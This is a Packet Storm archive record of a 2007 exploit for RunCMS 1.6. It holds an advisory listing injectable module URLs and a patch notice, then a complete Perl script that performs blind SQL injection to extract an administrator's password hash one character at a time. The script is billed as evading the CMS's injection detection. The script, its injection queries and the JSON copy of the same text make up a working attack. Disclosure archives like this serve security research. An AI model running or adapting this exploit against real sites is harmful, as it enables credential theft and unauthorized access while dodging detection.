ID PACKETSTORM:62122
Type packetstorm
Reporter Sh2kerr
Modified 2007-12-28T00:00:00
Description
`#/******************************************************************/
#/****** RUNCMS 1.6 BLIND SQL Injection Exploit + IDS evasion *****/
#/******************************************************************/
#/*********** exploit get hash of admin password *************/
#/*********** **************/
#/*********** Exploit is invisible for **************/
#/*********** RUNCMS sql injection detecting mechanism *************/
#/******************************************************************/
#/******************************************************************/
#/*********** tested on RUNCMS english version 1.6 *********/
#/******************************************************************/
#/******************************************************************/
#/* Date of Public EXPLOIT: December 25, 2007 */
#/* Written by: Alexandr "Sh2kerr" Polyakov */
#/* from [Digital Security Research Group] */
#/* research [at] dsec [dot] ru */
#/* */
#/*Original Advisory: http://www.securityfocus.com/archive/1/485512*/ */
#/******************************************************************/
#
#
#
#
# Details
#************************************************************************************
#
#
# Multiple Blind SQL Injection
#
# Attacker can inject SQL code in modules:
#
# http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
#
# Example:
#
# This query will return link to download file:
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
#
#
# This query will return error:
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0
#
#
#
# Fix Information
#*************************************************************************************
#
#RunCMS was altered to fix this flaw on Dec 15, 2007. Updated version (1.6.1) can be downloaded here:
# http://www.runcms.org/modules/mydownloads/visit.php?lid=131
#
#
#
# About
#*************************************************************************************
#
# Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration
# testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
# Digital Security Research Group focuses on web application and database security problems with vulnerability reports,
# advisories and whitepapers posted regularly on our website.
#
#
# Contact: research [at] dsec [dot] ru
# http://www.dsec.ru (in Russian)
#
#
#
#
##############################################################################v
#!/usr/bin/perl
use LWP::UserAgent;
$path = $ARGV[0];
$string = "this file must"; # !!CHEAT!! this string must be changed ef Runsms language is not English
$user_id = $ARGV[1];
if (@ARGV < 2) { &usage; }
$s_num =1;
$n=0;
$|++;
print "\r\n\r\n";
print "****** RunCMS 1.6 Blind SQLInjection + IDS Evasion by Sh2kerr (DSecRG) ******\r\n";
print "*****************************************************************************\r\n";
while(1)
{
&found(48,122);
if ($char=="0")
{
print "\r\n\r\n";
print "*****************************************************************************\r\n";
print " Admin Password Hash: $allchar\r\n";
print "*****************************************************************************\r\n";
exit();
}
else
{ print ":) "; $allchar .= chr($char);
}
$s_num++;
}
if ($char=="0")
{}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char }
$r = int($fmax - ($fmax-$fmin)/2);
$check = ">$r";
if ( &check($check) )
{ &found($r,$fmax); }
else { &found($fmin,$r+1); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i;}
$i++;
}
return;
}
sub check($)
{
$n++;
$ccheck = $_[0];
$http_query = $path." AND ascii(substring((SELECT(pass)FROM(runcms.runcms_users)WHERE uid=".$user_id."),".$s_num.",1))".$ccheck;
$mcb_reguest = LWP::UserAgent->new() or die;
$res = $mcb_reguest->post($http_query);
@results = $res->content;
foreach $result(@results)
{
if ($result =~ /$string/) { return 1; }
}
return 0;
}
sub usage
{
print "Usage: $0 [path_to_script?param] user_id \r\n";
print "e.g. : $0 http://[site]/modules/mydownloads/visit.php?lid=3 1";
exit();
}
`
{"hash": "e10ea0b1b87a97b77434b6120632840fe73dda4adcd586f6f1096fe3f588f2c6", "sourceHref": "https://packetstormsecurity.com/files/download/62122/runcms-sqlids.txt", "title": "runcms-sqlids.txt", "id": "PACKETSTORM:62122", "published": "2007-12-28T00:00:00", "description": "", "modified": "2007-12-28T00:00:00", "sourceData": "`#/******************************************************************/ \n#/****** RUNCMS 1.6 BLIND SQL Injection Exploit + IDS evasion *****/ \n#/******************************************************************/ \n#/*********** exploit get hash of admin password *************/ \n#/*********** **************/ \n#/*********** Exploit is invisible for **************/ \n#/*********** RUNCMS sql injection detecting mechanism *************/ \n#/******************************************************************/ \n#/******************************************************************/ \n#/*********** tested on RUNCMS english version 1.6 *********/ \n#/******************************************************************/ \n#/******************************************************************/ \n#/* Date of Public EXPLOIT: December 25, 2007 */ \n#/* Written by: Alexandr \"Sh2kerr\" Polyakov */ \n#/* from [Digital Security Research Group] */ \n#/* research [at] dsec [dot] ru */ \n#/* */ \n#/*Original Advisory: http://www.securityfocus.com/archive/1/485512*/ */ \n#/******************************************************************/ \n# \n# \n# \n# \n# Details \n#************************************************************************************ \n# \n# \n# Multiple Blind SQL Injection \n# \n# Attacker can inject SQL code in modules: \n# \n# http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION \n# \n# Example: \n# \n# This query will return link to download file: \n# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0 \n# \n# \n# This query will return error: \n# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0 \n# \n# \n# \n# Fix Information \n#************************************************************************************* \n# \n#RunCMS was altered to fix this flaw on Dec 15, 2007. Updated version (1.6.1) can be downloaded here: \n# http://www.runcms.org/modules/mydownloads/visit.php?lid=131 \n# \n# \n# \n# About \n#************************************************************************************* \n# \n# Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration \n# testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. \n# Digital Security Research Group focuses on web application and database security problems with vulnerability reports, \n# advisories and whitepapers posted regularly on our website. \n# \n# \n# Contact: research [at] dsec [dot] ru \n# http://www.dsec.ru (in Russian) \n# \n# \n# \n# \n##############################################################################v \n \n \n \n \n \n \n \n#!/usr/bin/perl \n \n \nuse LWP::UserAgent; \n \n$path = $ARGV[0]; \n$string = \"this file must\"; # !!CHEAT!! this string must be changed ef Runsms language is not English \n$user_id = $ARGV[1]; \nif (@ARGV < 2) { &usage; } \n \n \n$s_num =1; \n$n=0; \n$|++; \nprint \"\\r\\n\\r\\n\"; \n \nprint \"****** RunCMS 1.6 Blind SQLInjection + IDS Evasion by Sh2kerr (DSecRG) ******\\r\\n\"; \nprint \"*****************************************************************************\\r\\n\"; \n \n \nwhile(1) \n{ \n&found(48,122); \n \nif ($char==\"0\") \n{ \n \n \nprint \"\\r\\n\\r\\n\"; \n \nprint \"*****************************************************************************\\r\\n\"; \nprint \" Admin Password Hash: $allchar\\r\\n\"; \nprint \"*****************************************************************************\\r\\n\"; \n \nexit(); \n} \nelse \n{ print \":) \"; $allchar .= chr($char); \n} \n \n$s_num++; \n} \n \nif ($char==\"0\") \n{} \n \n \n \n \n \nsub found($$) \n{ \nmy $fmin = $_[0]; \nmy $fmax = $_[1]; \n \n \nif (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char } \n \n$r = int($fmax - ($fmax-$fmin)/2); \n$check = \">$r\"; \n \nif ( &check($check) ) \n{ &found($r,$fmax); } \nelse { &found($fmin,$r+1); } \n} \n \n \n \nsub crack($$) \n{ \nmy $cmin = $_[0]; \nmy $cmax = $_[1]; \n$i = $cmin; \n \nwhile ($i<$cmax) \n{ \n$crcheck = \"=$i\"; \nif ( &check($crcheck) ) { return $i;} \n$i++; \n} \nreturn; \n} \n \n \n \nsub check($) \n{ \n \n$n++; \n$ccheck = $_[0]; \n \n$http_query = $path.\" AND ascii(substring((SELECT(pass)FROM(runcms.runcms_users)WHERE uid=\".$user_id.\"),\".$s_num.\",1))\".$ccheck; \n \n \n$mcb_reguest = LWP::UserAgent->new() or die; \n$res = $mcb_reguest->post($http_query); \n \n@results = $res->content; \nforeach $result(@results) \n{ \nif ($result =~ /$string/) { return 1; } \n} \nreturn 0; \n} \n \nsub usage \n{ \nprint \"Usage: $0 [path_to_script?param] user_id \\r\\n\"; \nprint \"e.g. : $0 http://[site]/modules/mydownloads/visit.php?lid=3 1\"; \nexit(); \n} \n \n \n`\n", "reporter": "Sh2kerr", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "3529549fdcf80f5197dbb40dbffb7991"}, {"key": "modified", "hash": "9f06faad2c63af74ccb0af0790fe0e15"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9f06faad2c63af74ccb0af0790fe0e15"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "cec8e5f15600cd27ab30729cf3a592b9"}, {"key": "sourceData", "hash": "990d2adbc3bf9226a3d10bfff124a0a5"}, {"key": "sourceHref", "hash": "9280e42be20e4f55b592334a7c01f4aa"}, {"key": "title", "hash": "e792244a52d82b968ba2d7507130be41"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/62122/runcms-sqlids.txt.html", "lastseen": "2016-11-03T10:16:41", "viewCount": 0, "enchantments": {"vulnersScore": 5.4}}
{"result": {}}